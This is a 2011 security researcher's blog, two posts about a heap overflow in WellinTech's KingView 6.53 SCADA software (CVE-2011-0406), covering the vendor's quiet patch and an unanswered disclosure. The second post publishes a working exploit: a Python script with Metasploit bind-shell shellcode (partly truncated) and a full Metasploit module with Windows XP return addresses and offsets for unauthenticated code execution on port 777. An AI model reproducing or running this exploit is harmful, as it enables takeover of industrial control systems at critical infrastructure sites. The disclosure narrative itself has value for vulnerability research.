Tuesday, January 11, 2011

WellinTech issues security patch to address the vulnerability in KingView 6.53

WellinTech released a patch addressing the heap based buffer overflow vulnerability in KingView version 6.53, what is now defined as CVE-2011-0406, according to the National Vulnerability Database (NVD).

WellinTech's vulnerability disclosure included a short paragraph about the vulnerability which was published on the Chinese version of their website and not on the English version as of December 15, 2010.

In addition, the archived patch (.rar) doesn't have any changelog or release notes, i.e., information about the security vulnerability and what issues are addressed in the patch. This is obviously not what most in the software industry would consider best practices.

In fact, the archive doesn't contain any information relating to the impact or vulnerability and there are no CNVD reference pointers, because CNVD never published anything about the vulnerability even after the patch went out. How do you explain that?

My question to WellinTech is, "Do you always issue critical software updates relating to security vulnerabilities without releasing a history of changes bundled with the patch?"

According to the response on WellinTech's website, the vulnerability was covered in about two sentences. Most of which consisted of the vendor giving all credit to the China National Vulnerability Database (CNVD), without any mention of my discovery, disclosure, and the trigger they received back in September 2010.

Even though WellinTech would rather not acknowledge that an independent security researcher discovered a critical flaw in their product, they still have a certain amount of responsibility to respond to all parties involved.

By disclosing the vulnerability to WellinTech, CN-CERT and US-CERT I am confident that I have done the right thing. I was only trying to help and assist with the issue affecting KingView. I might have prevented a catastrophic event from taking place. As an example, one need not look too far into the past to reflect on what happened with Stuxnet, which was essentially a bundle of zero-day exploits inside a worm.

In fact, just for the record, this is not the first SCADA software vulnerability I have disclosed. Sometime between 2009 and 2010, I reported a vulnerability involving a product by the software company SIELCO SISTEMI. I reported a vulnerability in the product Winlog Lite which was subsequently patched within a short period of time. The vendor responded within 10-15 days and promptly issued a patch along with a very pleasant email thanking me for reporting the bug.

I am very suspicious as to why WellinTech kept the disclosure so quiet. I believe the public will eventually start asking questions about why CN-CERT, CNVD and WellinTech were so illusive.

The vulnerability information WellinTech provided is only available in Chinese, even though they have a version in English.

Pay close attention to the path in the URL.



The Chinese version of the patch:


Where is the English version?

If the Chinese version of the patch works with the English version of KingView 6.53, then why not update the English web site?

I'm not going to let the actions of one vendor in China keep me from disclosing other vulnerabilities in the future relating to Chinese software. 

When people deserve reward, this should be duly noted even if you personally detest them. When people deserve punishment, this should not be forgone even if they are close to you...
 Mei Yaochen


10:52 PM CST 1/12/2011

As of 1/12/2011  China's National Vulnerability Database has disclosed an advisory for WellinTech's KingView 6.53 HistorySvr heap buffer overflow vulnerability.


I am very pleased to see the information is now available to the general public.

Sunday, January 9, 2011

Waking up the sleeping dragon

On September 28, 2010 I notified Beijing based WellinControl Technology Development Co.,Ltd  and CN-CERT that one of Wellintech's products had a very serious security vulnerability, and that if properly leveraged would allow an attacker to exploit the bug and execute arbitrary code. The vendor and China's National Computer Network Emergency Response Team never responded to my email or the follow up email sent out by US-CERT.  Keep in mind this is not any old software. The vulnerability affects one of the most widely trusted and used supervisory control and data acquisition applications in China.

KingView 6.53 

KingView 6.53


While I found it extremely disappointing that Wellintech never responded to my disclosure, I was far more bothered with the fact that CN-CERT never responded. What are they doing over there?

However, US-CERT responded within a few weeks of disclosing the vulnerability. US-CERT explained in the email that their team would notify the vendor and respond back with more information as it became available.

They even took the time to express appreciation in a follow up email for disclosing the vulnerability. I must admit, it would have been nice to have received a prompt response from CN-CERT at least letting me know that they received the information and would look into it...

Is this CN-CERT's standard operating procedure?  We know what happens when important security vulnerability disclosures go unaddressed for long periods of time.

Moreover, after waiting several months to see if Wellintech would quietly issue a patch to fix the security vulnerability they didn't. I made a decision to develop a working exploit with code execution to prove that this wasn't just another "software bug".

My initial disclosure to the vendor contained enough pertinent information and the proof of concept code to trigger the bug and overwrite pointers in memory thus allowing arbitrary code code execution.

Vulnerable HistorySvr.exe KingView Process Heap Overflow

What was the problem I asked myself? Why did they fail to respond? Did they want code execution? Why not just fix the vulnerability?

One of my colleagues at NSS Labs has a saying...

"It's hard to argue with a shell" -- Rick Moy

Here it is, a tiny little tcp bind shell courtesy of the Metasploit Framework

Hopefully this will be an incentive to issue a patch to all of Wellintech's customers. :-) 


## usage python exploit.py 777

import os
import socket
import sys

host = sys.argv[1]
port = int(sys.argv[2])

print " KingView 6.53 SCADA HMI Heap Smashing Exploit "
print " Credits: Dillon Beresford | twitter.com/D1N "

# windows/shell_bind_tcp - 368 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# LPORT=4444, RHOST=, EXITFUNC=process, InitialAutoRunScript=,
# AutoRunScript=
buf = ("\xdd\xc4\xd9\x74\x24\xf4\x5a\x33\xc9\xbe\xeb\x5d\x85\x19"

exploit = ("\x90" * 1024 + "\x44" * 31788)
exploit += ("\xeb\x14") # our JMP (over the junk and into nops)
exploit += ("\x44" * 6)
exploit += ("\xad\xbb\xc3\x77") # ECX 0x77C3BBAD --> call dword ptr ds:[EDI+74]
exploit += ("\xb4\x73\xed\x77") # EAX 0x77ED73B4 --> UnhandledExceptionFilter()
exploit += ("\x90" * 21)
exploit += buf

print "  [+] Herrow Sweeping Dragon..."
print "  [+] Sending payload..."

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 
data = s.recv(1024)

print "  [+] Closing connection.."
print "  [+] Done!"

Metasploit Module for the KingView historysvr.exe works with XP SP3.

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking

include Msf::Exploit::Remote::Tcp

def initialize(info={})

'Name'        => "KingView 6.53 SCADA HMI HistorySvr Heap Overflow",
'Description' => %q{
This module exploits a buffer overflow in Kingview 6.53.  By sending a specially
crafted request to port 777 (HistorySvr.exe), a remote attacker can
gain arbitrary code execution without authentication and take control of
the machine running KingView 6.53
'License'  => MSF_LICENSE,
'Version'  => "$Revision$",
'Author'      =>
'Dillon Beresford',
'References' =>
['CVE', '2011-0406'],
['OSVDB', '70366'],
['Bugtraq', '45727'],
['URL', 'http://www.exploit-db.com/exploits/15957'],
['URL', 'http://www.kb.cert.org/vuls/id/180119'],
['URL', 'http://thesauceofutterpwnage.blogspot.com/2011/01/waking-up-sleeping-dragon.html'],
'DefaultOptions' =>
'EXITFUNC' => 'process',
'InitialAutoRunScript' => 'migrate -f',
'Payload' =>
'Space'    => 12000,
'BadChars' => "\x00\x0d\x0a\xff",
'StackAdjustment' => -3500,
'Platform' => 'win',
'Targets' =>
[ 'Windows XP SP3 ENG',
'Ret' =>   0x7c997ca9, # ntdll.dll jmp ecx
'Offset' => 31752, # method by D1N
[ 'Windows XP SP3 ENG 2',
'Ret' => 0x7C9A432B, # ntdll.dll jmp ecx
'Offset' => 31752, # method by rick2600
[ 'Windows XP SP1 ENG',
'Ret' => 0x77ED73B4, # UnhandledExceptionFilter() in kernel32.dll
'Offset' => 31788,
[ 'Debug',
'Ret' => 0x41424344, # Debug
'Offset' => 31788,

'DisclosureDate' => "9/28/2010",
'DefaultTarget' => 0))

register_options( [ Opt::RPORT(777) ], self.class )

def exploit
sploit = ''

if target.name =~ /XP SP3 ENG/
sploit = make_nops(1024)
sploit << payload.encoded
sploit <<  rand_text_alpha_upper(target['Offset'] - payload.encoded.length)
sploit << [target.ret].pack('V')
sploit << make_nops(10)
sploit << Rex::Arch::X86.jmp_short(4)
sploit << make_nops(6)
sploit << "\xe9\x08\x80"
sploit << "\xff\xff"

elsif target.name =~ /XP SP3 ENG 2/
sploit = "\x90" * 1024
sploit << payload.encoded
sploit << rand_text_alpha_upper(target['Offset'] - payload.encoded.length)
sploit << [target.ret].pack('V')
sploit << "\x00"  # PAD
sploit << "\x81\xE9\x08\x80\x00\x00" # SUB ECX,0x8008
sploit << "\xFF\xE1" # JMP ECX

elsif target.name =~ /XP SP1 ENG/
#rick2600 and d1n
sploit << "\x90"*1024
sploit << rand_text_alpha_upper(target['Offset'] - payload.encoded.length)
sploit << "\xEB\x10"
sploit << "\x41"*6
sploit << "\xAD\xBB\xC3\x77"
sploit << [target.ret].pack('V')
sploit << "\x90"*8
sploit << payload.encoded
sploit << "\x44"*1000-sploit.length

elsif target.name =~ /Debug/

sploit << "\x90"*1024
sploit << payload.encoded
sploit << rand_text_alpha_upper(target['Offset'] - payload.encoded.length)
sploit << [target.ret].pack('V')







Or you can grab it from Exploit-DB

At the time of this blog post, the vulnerable SCADA software is still available on Wellintech's website for download and presumably running at various critical infrastructure sites in CHINA. I have recently contacted US-CERT again, but this time through my employer just to check if the vendor had responded, the folks from US-CERT told me they still hadn't received any response from Wellintech.

At this point the only thing left for me to do was share the information with the security community and send it over to the good people at Exploit-DB.

A special thanks to the guys over at Metasploit for their handy rapid exploit development modules and some brave souls like David Litchfield, Dave Aitel and Steven Seeley who have sacrificed countless hours of time writing up tutorials on heaps. :-)

I'm not sure whats worse, a 0day for the most popular SCADA software in China floating around in the wild or a team of security professionals from China's CERT sleeping behind the wheel.
